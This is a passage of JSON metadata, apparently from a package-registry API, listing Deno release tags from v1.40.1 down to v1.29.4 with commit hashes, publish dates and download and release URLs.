1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/t